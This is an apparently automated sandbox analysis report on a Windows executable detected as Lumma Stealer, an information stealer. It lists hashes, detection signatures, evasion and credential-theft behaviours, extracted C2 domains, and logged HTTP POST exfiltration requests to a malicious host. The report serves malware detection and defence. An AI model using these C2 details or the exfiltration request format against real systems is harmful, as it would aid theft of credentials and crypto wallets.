
Windows Analysis Report
QQ5BxgG5G6.exe

Overview

General Information

Sample name: QQ5BxgG5G6.exe (renamed because the original name is a hash value)
Original sample name: 4a7846259e3d582b57bd30c67322c357.exe
Analysis ID: 1579757
MD5: 4a7846259e3d582b57bd30c67322c357
SHA1: 3e54a3d27a36c4a24b7f642da39c0477d23d1848
SHA256: 11774b91cf5fc5c4ad30a79ea9a2159271de17c68b2ac7149b15fb23d9828587
Tags: exe, user-abuse_ch

Detection

Family: LummaC
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • QQ5BxgG5G6.exe (PID: 7792 cmdline: "C:\Users\user\Desktop\QQ5BxgG5G6.exe" MD5: 4A7846259E3D582B57BD30C67322C357)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["sendypaster.xyz", "smash-boiling.cyou", "steppriflej.xyz", "supporse-comment.cyou", "pollution-raker.cyou", "hosue-billowy.cyou", "ripe-blade.cyou", "cuddlyready.xyz", "greywe-snotty.cyou"], "Build id": "PsFKDg--pablo"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: QQ5BxgG5G6.exe PID: 7792 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: QQ5BxgG5G6.exe PID: 7792 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: QQ5BxgG5G6.exe PID: 7792 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
              No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T08:38:50.538800+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49705 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:52.513407+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:55.423450+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49707 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:57.659276+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49708 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:59.961477+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49709 | 104.21.32.96 | 443 | TCP
2024-12-23T08:39:02.515687+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49710 | 104.21.32.96 | 443 | TCP
2024-12-23T08:39:05.146490+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49712 | 104.21.32.96 | 443 | TCP
2024-12-23T08:39:08.780984+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:51.286446+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49705 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:53.600013+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:51.286446+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49705 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:53.600013+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:56.325027+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49707 | 104.21.32.96 | 443 | TCP


              AV Detection

Source: QQ5BxgG5G6.exe | Avira: detected
Source: QQ5BxgG5G6.exe.7792.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["sendypaster.xyz", "smash-boiling.cyou", "steppriflej.xyz", "supporse-comment.cyou", "pollution-raker.cyou", "hosue-billowy.cyou", "ripe-blade.cyou", "cuddlyready.xyz", "greywe-snotty.cyou"], "Build id": "PsFKDg--pablo"}
Source: QQ5BxgG5G6.exe | Virustotal: Detection: 56%
Source: QQ5BxgG5G6.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: QQ5BxgG5G6.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: pollution-raker.cyou
Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: hosue-billowy.cyou
Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: ripe-blade.cyou
Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: smash-boiling.cyou
Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: supporse-comment.cyou
Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: greywe-snotty.cyou
Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: steppriflej.xyz
Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: sendypaster.xyz
Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: cuddlyready.xyz
Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: PsFKDg--pablo
Source: QQ5BxgG5G6.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Directory queried: number of queries: 1001

              Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49705 -> 104.21.32.96:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 104.21.32.96:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49706 -> 104.21.32.96:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.32.96:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49707 -> 104.21.32.96:443
Source: Malware configuration extractor | URLs: sendypaster.xyz
Source: Malware configuration extractor | URLs: smash-boiling.cyou
Source: Malware configuration extractor | URLs: steppriflej.xyz
Source: Malware configuration extractor | URLs: supporse-comment.cyou
Source: Malware configuration extractor | URLs: pollution-raker.cyou
Source: Malware configuration extractor | URLs: hosue-billowy.cyou
Source: Malware configuration extractor | URLs: ripe-blade.cyou
Source: Malware configuration extractor | URLs: cuddlyready.xyz
Source: Malware configuration extractor | URLs: greywe-snotty.cyou
Source: DNS query: cuddlyready.xyz
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.32.96:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.32.96:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.32.96:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 104.21.32.96:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.32.96:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 104.21.32.96:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.32.96:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.21.32.96:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 47 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6M4MVPLOGKI530K8YLD | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12852 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=XWG7F67A48QVQTANXO | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15075 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=SZOO0P7591CXSVW1X | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20236 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=B15U8NRI2RHK | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1200 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=TLUL9N00R954C6U | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 552337 | Host: cuddlyready.xyz
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: cuddlyready.xyz
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: cuddlyready.xyz
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1580254004.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1557425029.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1483903137.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579432168.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634153690.00000000015FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1579286191.0000000005CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509661602.0000000005CCB000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1509917557.0000000005CCB000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1509507807.0000000005CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz//
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1579286191.0000000005CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/Z
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1580143357.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579237767.0000000001635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/a8
              Source: QQ5BxgG5G6.exe, QQ5BxgG5G6.exe, 00000000.00000002.1635634925.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579237767.0000000001621000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634334937.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1483903137.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1557463856.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.0000000001589000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579492722.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000002.1635508382.0000000001589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/api
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1530950088.0000000005CDE000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1530842219.0000000005CD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/api/
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1635634925.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634334937.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apis
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1635838883.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1597421580.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634399768.0000000001634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/h
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1483903137.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/pi
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1635838883.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1597421580.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634399768.0000000001634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/pi0
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1633788926.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/api
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1635508382.0000000001593000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/apil
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1532675848.0000000005D5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
